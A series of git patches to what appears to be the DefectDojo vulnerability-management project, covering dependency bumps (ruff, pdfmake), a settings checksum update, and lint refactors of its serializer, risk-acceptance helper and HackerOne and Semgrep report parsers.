@@ -ruff==0.6.6 \ No newline at end of file +ruff==0.6.7 \ No newline at end of file From 86b9ed01adc8b52d2cdfa786b31b2002bee2edcf Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 23 Sep 2024 13:29:44 -0500 Subject: [PATCH 59/62] Bump pdfmake from 0.2.12 to 0.2.13 in /components (#10950) Bumps [pdfmake](https://github.com/bpampuch/pdfmake) from 0.2.12 to 0.2.13. - [Release notes](https://github.com/bpampuch/pdfmake/releases) - [Changelog](https://github.com/bpampuch/pdfmake/blob/0.2.13/CHANGELOG.md) - [Commits](https://github.com/bpampuch/pdfmake/compare/0.2.12...0.2.13) --- updated-dependencies: - dependency-name: pdfmake dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- components/package.json | 2 +- components/yarn.lock | 8 ++++---- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/components/package.json b/components/package.json index b1a047f22bc..e5df589df37 100644 --- a/components/package.json +++ b/components/package.json @@ -35,7 +35,7 @@ "metismenu": "~3.0.7", "moment": "^2.30.1", "morris.js": "morrisjs/morris.js", - "pdfmake": "^0.2.12", + "pdfmake": "^0.2.13", "startbootstrap-sb-admin-2": "1.0.7" }, "engines": { diff --git a/components/yarn.lock b/components/yarn.lock index 8bd8311e89b..7bb19365790 100644 --- a/components/yarn.lock +++ b/components/yarn.lock @@ -824,10 +824,10 @@ path-parse@^1.0.7: resolved "https://registry.yarnpkg.com/path-parse/-/path-parse-1.0.7.tgz#fbc114b60ca42b30d9daf5858e4bd68bbedb6735" integrity sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw== -pdfmake@^0.2.12: - version "0.2.12" - resolved "https://registry.yarnpkg.com/pdfmake/-/pdfmake-0.2.12.tgz#5156f91ff73797947942aa342423bedaa0c0bc93" - integrity sha512-TFsqaG6KVtk+TWermmJNNwom3wmB/xiz07prM74KBhdM+7pz3Uwq2b0uoqhhQRn6cYUTpL8lXZY6xF011o1YcQ== +pdfmake@^0.2.13: + version "0.2.13" + resolved "https://registry.yarnpkg.com/pdfmake/-/pdfmake-0.2.13.tgz#ea43fe9f0c8de1e5ec7b08486d6f4f8bbb8619e4" + integrity sha512-qeVE9Bzjm0oPCitH4/HYM/XCGTwoeOAOVAXPnV3s0kpPvTLkTF/bAF4jzorjkaIhXGQhzYk6Xclt0hMDYLY93w== dependencies: "@foliojs-fork/linebreak" "^1.1.1" "@foliojs-fork/pdfkit" "^0.14.0" From b0f0c3aebb67f52ab2afc2c8a900de6a1f037969 Mon Sep 17 00:00:00 2001 From: Ross Esposito Date: Mon, 23 Sep 2024 13:34:01 -0500 Subject: [PATCH 60/62] Fixing sha settings value --- dojo/settings/.settings.dist.py.sha256sum | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dojo/settings/.settings.dist.py.sha256sum b/dojo/settings/.settings.dist.py.sha256sum index f8adf9d7d4e..8a22d6140cf 100644 --- a/dojo/settings/.settings.dist.py.sha256sum +++ b/dojo/settings/.settings.dist.py.sha256sum @@ -1 +1 @@ -f7e63afa0003d1992f8247f9a7a830847bd7498fa1e2d46d6ea04e3006bb9ee2 +bf2078296b31ba8c8376fdd88bbf1d552d0fba8b6e465a8552ac2fa901aa7e60 From 38ed4c19d344f69b796c9fc8803264b67b1b8296 Mon Sep 17 00:00:00 2001 From: Ross Esposito Date: Mon, 23 Sep 2024 14:08:47 -0500 Subject: [PATCH 61/62] Fixing more lint errors --- dojo/api_v2/serializers.py | 4 ++-- dojo/metrics/utils.py | 3 +-- dojo/product_type/queries.py | 1 + dojo/risk_acceptance/helper.py | 4 ++-- dojo/tools/h1/parser.py | 20 ++++++++++---------- dojo/tools/semgrep/parser.py | 6 +++--- 6 files changed, 19 insertions(+), 19 deletions(-) diff --git a/dojo/api_v2/serializers.py b/dojo/api_v2/serializers.py index 658f45df6a5..371f9f4266f 100644 --- a/dojo/api_v2/serializers.py +++ b/dojo/api_v2/serializers.py @@ -555,8 +555,8 @@ def validate(self, data): if self.context["request"].method == "POST" and "password" not in data: msg = "Passwords must be supplied for new users" raise ValidationError(msg) - else: - return super().validate(data) + + return super().validate(data) class UserContactInfoSerializer(serializers.ModelSerializer): diff --git a/dojo/metrics/utils.py b/dojo/metrics/utils.py index b68829da1b3..d22b13beb4d 100644 --- a/dojo/metrics/utils.py +++ b/dojo/metrics/utils.py @@ -37,8 +37,7 @@ def get_metrics_finding_filter_class() -> Type[Union[MetricsFindingFilter, MetricsFindingFilterWithoutObjectLookups]]: if get_system_setting("filter_string_matching", False): return MetricsFindingFilterWithoutObjectLookups - else: - return MetricsFindingFilter + return MetricsFindingFilter def finding_queries( diff --git a/dojo/product_type/queries.py b/dojo/product_type/queries.py index 27c3b31d707..1d95ac81170 100644 --- a/dojo/product_type/queries.py +++ b/dojo/product_type/queries.py @@ -53,6 +53,7 @@ def get_authorized_global_members_for_product_type(product_type, permission): return Global_Role.objects.filter(group=None, role__isnull=False).order_by("user__first_name", "user__last_name").select_related("role", "user") return Global_Role.objects.none() + def get_authorized_groups_for_product_type(product_type, permission): user = get_current_user() diff --git a/dojo/risk_acceptance/helper.py b/dojo/risk_acceptance/helper.py index bc02b533f57..32dedf3f741 100644 --- a/dojo/risk_acceptance/helper.py +++ b/dojo/risk_acceptance/helper.py @@ -123,7 +123,7 @@ def remove_finding_from_risk_acceptance(user: Dojo_User, risk_acceptance: Risk_A author=user, )) - return None + return def add_findings_to_risk_acceptance(user: Dojo_User, risk_acceptance: Risk_Acceptance, findings: list[Finding]) -> None: @@ -148,7 +148,7 @@ def add_findings_to_risk_acceptance(user: Dojo_User, risk_acceptance: Risk_Accep # best effort jira integration, no status changes post_jira_comments(risk_acceptance, findings, accepted_message_creator) - return None + returnß @app.task diff --git a/dojo/tools/h1/parser.py b/dojo/tools/h1/parser.py index c386dec04d3..bdd60f44556 100644 --- a/dojo/tools/h1/parser.py +++ b/dojo/tools/h1/parser.py @@ -275,11 +275,11 @@ def get_findings(self, file: TemporaryUploadedFile, test: Test) -> list[Finding] file_name = file.name if str(file_name).endswith(".json"): return self.determine_json_format(file, test) - elif str(file_name).endswith(".csv"): + if str(file_name).endswith(".csv"): return self.determine_csv_format(file, test) - else: - msg = "Filename extension not recognized. Use .json or .csv" - raise ValueError(msg) + + msg = "Filename extension not recognized. Use .json or .csv" + raise ValueError(msg) def get_json_tree(self, file: TemporaryUploadedFile) -> dict: """Extract the CSV file into a iterable that represents a dict.""" @@ -298,9 +298,9 @@ def determine_json_format(self, file: TemporaryUploadedFile, test: Test) -> list return self.get_bug_bounty_program_json_findings(tree.get("findings", []), test) if "data" in tree: return self.get_vulnerability_disclosure_json_findings(tree, test) - else: - msg = "This JSON format is not supported" - raise ValueError(msg) + + msg = "This JSON format is not supported" + raise ValueError(msg) def get_csv_reader(self, file: TemporaryUploadedFile) -> csv.DictReader: """Extract the CSV file into a iterable that represents a dict.""" @@ -317,6 +317,6 @@ def determine_csv_format(self, file: TemporaryUploadedFile, test: Test) -> list[ # Check for some root elements if "bounty" in reader.fieldnames: return self.get_bug_bounty_program_csv_findings(reader, test) - else: - msg = "This CSV format is not supported" - raise ValueError(msg) + + msg = "This CSV format is not supported" + raise ValueError(msg) diff --git a/dojo/tools/semgrep/parser.py b/dojo/tools/semgrep/parser.py index b7472005daa..3cd37c638f1 100644 --- a/dojo/tools/semgrep/parser.py +++ b/dojo/tools/semgrep/parser.py @@ -133,11 +133,11 @@ def convert_severity(self, val): upper_value = val.upper() if upper_value == "CRITICAL": return "Critical" - elif upper_value in ["WARNING", "MEDIUM"]: + if upper_value in ["WARNING", "MEDIUM"]: return "Medium" - elif upper_value in ["ERROR", "HIGH"]: + if upper_value in ["ERROR", "HIGH"]: return "High" - elif upper_value == "LOW": + if upper_value == "LOW": return "Low" elif upper_value == "INFO": if "WARNING" == val.upper(): From 4c60a809e033652faefb1b1b4c814f001fb0b95a Mon Sep 17 00:00:00 2001 From: Ross Esposito Date: Mon, 23 Sep 2024 14:14:12 -0500 Subject: [PATCH 62/62] Fixing more lint errors pt 2 --- dojo/api_v2/serializers.py | 1 - dojo/risk_acceptance/helper.py | 2 +- dojo/tools/h1/parser.py | 3 --- dojo/tools/semgrep/parser.py | 2 +- 4 files changed, 2 insertions(+), 6 deletions(-) diff --git a/dojo/api_v2/serializers.py b/dojo/api_v2/serializers.py index 371f9f4266f..5109bd068f0 100644 --- a/dojo/api_v2/serializers.py +++ b/dojo/api_v2/serializers.py @@ -555,7 +555,6 @@ def validate(self, data): if self.context["request"].method == "POST" and "password" not in data: msg = "Passwords must be supplied for new users" raise ValidationError(msg) - return super().validate(data) diff --git a/dojo/risk_acceptance/helper.py b/dojo/risk_acceptance/helper.py index 32dedf3f741..1cd1b15cdae 100644 --- a/dojo/risk_acceptance/helper.py +++ b/dojo/risk_acceptance/helper.py @@ -148,7 +148,7 @@ def add_findings_to_risk_acceptance(user: Dojo_User, risk_acceptance: Risk_Accep # best effort jira integration, no status changes post_jira_comments(risk_acceptance, findings, accepted_message_creator) - returnß + return @app.task diff --git a/dojo/tools/h1/parser.py b/dojo/tools/h1/parser.py index bdd60f44556..8aa3fc5ff28 100644 --- a/dojo/tools/h1/parser.py +++ b/dojo/tools/h1/parser.py @@ -277,7 +277,6 @@ def get_findings(self, file: TemporaryUploadedFile, test: Test) -> list[Finding] return self.determine_json_format(file, test) if str(file_name).endswith(".csv"): return self.determine_csv_format(file, test) - msg = "Filename extension not recognized. Use .json or .csv" raise ValueError(msg) @@ -298,7 +297,6 @@ def determine_json_format(self, file: TemporaryUploadedFile, test: Test) -> list return self.get_bug_bounty_program_json_findings(tree.get("findings", []), test) if "data" in tree: return self.get_vulnerability_disclosure_json_findings(tree, test) - msg = "This JSON format is not supported" raise ValueError(msg) @@ -317,6 +315,5 @@ def determine_csv_format(self, file: TemporaryUploadedFile, test: Test) -> list[ # Check for some root elements if "bounty" in reader.fieldnames: return self.get_bug_bounty_program_csv_findings(reader, test) - msg = "This CSV format is not supported" raise ValueError(msg) diff --git a/dojo/tools/semgrep/parser.py b/dojo/tools/semgrep/parser.py index 3cd37c638f1..883fcc4f31a 100644 --- a/dojo/tools/semgrep/parser.py +++ b/dojo/tools/semgrep/parser.py @@ -139,7 +139,7 @@ def convert_severity(self, val): return "High" if upper_value == "LOW": return "Low" - elif upper_value == "INFO": + if upper_value == "INFO": if "WARNING" == val.upper(): return "Medium" if "ERROR" == val.upper() or "HIGH" == val.upper():